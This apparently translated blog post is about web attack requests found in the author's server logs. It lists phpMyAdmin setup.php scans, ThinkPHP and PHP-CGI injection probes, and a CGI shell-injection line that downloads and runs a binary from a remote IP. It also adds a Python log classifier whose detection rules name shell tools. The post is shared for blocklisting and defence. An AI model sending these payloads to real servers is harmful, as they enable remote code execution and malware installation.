Sharing the PHP web request attacks I found by reading the server logs

Update, 26 August 2020: blacklist IP list refreshed

A few days ago, with nothing better to do, I took a look at the server's request logs. You really don't know until you look, and when you look it's a shock!

Attack requests from all over far outnumber the legitimate visits...

Although, limited by the attackers' skill, none of this amounted to an effective attack, I decided to do a little something about it anyway: add the malicious IPs to a blacklist, and write this post to commemorate the days under attack.

I recall that the last time I noticed something unusual was about a year ago, when the server's CPU sat at 100%. I've forgotten the details; I only remember killing the process and closing the port, after which a rough cleanup got things back to OK.

This post lists the source IPs of the requests and the requests themselves, so that anyone passing by can take precautions.

IPs


These IPs can go straight onto a blacklist. Some of them may just be compromised hosts being used as relays, but they get blocked along with the rest.

Requests


/cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a

http:// xxx:xxx:xxx:xxx//myadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx//phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/phpmyadmin/scripts/setup.php
http:// xxx:xxx:xxx:xxx/pma2011/scripts/setup.php
http:// xxx:xxx:xxx:xxx/muieblackcat

92.118.161.33 - - [29/Mar/2020:05:48:22 +0800] "GET / HTTP/1.1" 200 17899 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"

http:// xxx:xxx:xxx:xxx/thinkphp/html/public/index.php
http:// xxx:xxx:xxx:xxx/TP/index.php 
http:// xxx:xxx:xxx:xxx/TP/public/index.php
http://clientapi.ipip.net/echo.php?info=1234567890
http:// xxx:xxx:xxx:xxx/portal/redlion

POST /boaform/admin/formPing
http://5.188.210.101/echo.php
http://xunsu.online/server-status
/data/admin/allowurl.txt
/xd.php
/robots.txt
http:// xxx:xxx:xxx:xxx/Report.docx 
/solr/admin/info/system?wt=json
/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
/?XDEBUG_SESSION_START=phpstorm
/HNAP1/
/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
/statics/css/crop.css
/js/index.js
/public/simpleboot/css/simplebootadmin.css
/js/tc.js
/public/js/image.js
/wangdafa
http:// xxx:xxx:xxx:xxx/hudson
http://xunsu.online/xd.php
/hazelcast/rest/cluster
/index.php?s=/index/
/myadmin/scripts/db___.init.php
/plugins/weathermap/editor.php
/weathermap/editor.php
/Joomla/

93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:29 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:30 +0800] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /pma2012/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:32 +0800] "GET /PMA2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /pma2011/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:33 +0800] "GET /PMA2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /pma2013/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:34 +0800] "GET /PMA2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2014/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /PMA2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:35 +0800] "GET /pma2015/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /PMA2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:36 +0800] "GET /pma2016/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin3/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:37 +0800] "GET /phpmyadmin4/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin5/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:38 +0800] "GET /phpmyadmin6/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:39 +0800] "GET /phpmyadmin7/scripts/setup.php HTTP/1.1" 404 227 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /pma/scripts/setup.php HTTP/1.1" 404 219 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:40 +0800] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:41 +0800] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:42 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:43 +0800] "GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1" 404 235 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.1" 404 234 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:44 +0800] "GET /phpMyAdmin-2.11.11.3/scripts/setup.php HTTP/1.1" 404 236 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1" 404 248 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:45 +0800] "GET /dbadmin/scripts/setup.php HTTP/1.1" 404 223 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /scripts/setup.php HTTP/1.1" 404 215 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1" 404 228 "-" "ZmEu"
93.174.93.143 - - [15/Mar/2020:03:26:49 +0800] "GET /mysql/scripts/setup.php HTTP/1.1" 404 221 "-" "ZmEu"

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

Looking closely at the requests above, it's easy to see that the attacks fall into two main categories: one targets phpMyAdmin (PMA), the other sweeps through files with known bugs in open-source frameworks and open-source CMSes such as ThinkPHP and WordPress. A little hardening is enough to block most of them.
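As an added example (not code from the original post), here is a small Python triage script that applies the two categories above to access-log lines in the format shown, and produces the per-IP hit counts used for blacklisting. The rule labels and the 10.0.0.x sample addresses are my own.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Combined log format as shown in the post: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Ordered rules, first match wins (labels are mine); paths are percent-decoded first so hex/${IFS} obfuscation is matched in the clear.
RULES = [
    ("pma-setup-scan", lambda p: re.search(r"/scripts/setup\.php$", p, re.I)),
    ("thinkphp-rce-probe", lambda p: re.search(r"invokefunction|HelloThink", p, re.I)),
    ("php-cgi-arg-injection", lambda p: p.startswith("/cgi-bin/php?-d") or "auto_prepend_file=php://input" in p),
    ("cgi-shell-injection", lambda p: re.search(r"\$\{IFS\}|/bin/sh|busybox", p)),
]

def classify(path):
    """Label a request path by attack family, or None when no rule fires (treated as benign)."""
    decoded = unquote_plus(path)
    for label, pred in RULES:
        if pred(decoded):
            return label
    return None

def scan(lines):
    """Per-IP count of flagged requests plus the set of families each IP was seen probing."""
    hits, families = Counter(), defaultdict(set)
    for line in lines:
        rec = LOG_RE.match(line.strip())  # lines not in combined format are skipped
        label = classify(rec["path"]) if rec else None
        if label:
            hits[rec["ip"]] += 1
            families[rec["ip"]].add(label)
    return hits, families

def blacklist(lines, min_hits=1):
    """IPs with at least min_hits flagged requests, busiest first, ready for a deny list."""
    hits, _ = scan(lines)
    return [ip for ip, n in hits.most_common() if n >= min_hits]

# Constructed sample: two of the post's ZmEu setup.php probes, a ThinkPHP probe, a php-cgi argument
# injection using the post's hex prefix, a shell injection with its command REDACTED, and a benign fetch.
SAMPLE = [
    '93.174.93.143 - - [15/Mar/2020:03:26:28 +0800] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"',
    '93.174.93.143 - - [15/Mar/2020:03:26:29 +0800] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 226 "-" "ZmEu"',
    '10.0.0.5 - - [15/Mar/2020:04:00:00 +0800] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [15/Mar/2020:04:01:00 +0800] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 404 200 "-" "-"',
    '10.0.0.7 - - [15/Mar/2020:04:02:00 +0800] "GET /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}REDACTED%0A%27 HTTP/1.1" 404 200 "-" "-"',
    '10.0.0.8 - - [15/Mar/2020:04:03:00 +0800] "GET /robots.txt HTTP/1.1" 200 60 "-" "Mozilla/5.0"',
]
```

On a real log, pass the open file object to blacklist() and raise min_hits so a single stray hit does not block a legitimate visitor.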

Copyright notice

弈心博客 (Yixin Blog)


This article was first published on site_name; please include a link to the original post when reposting!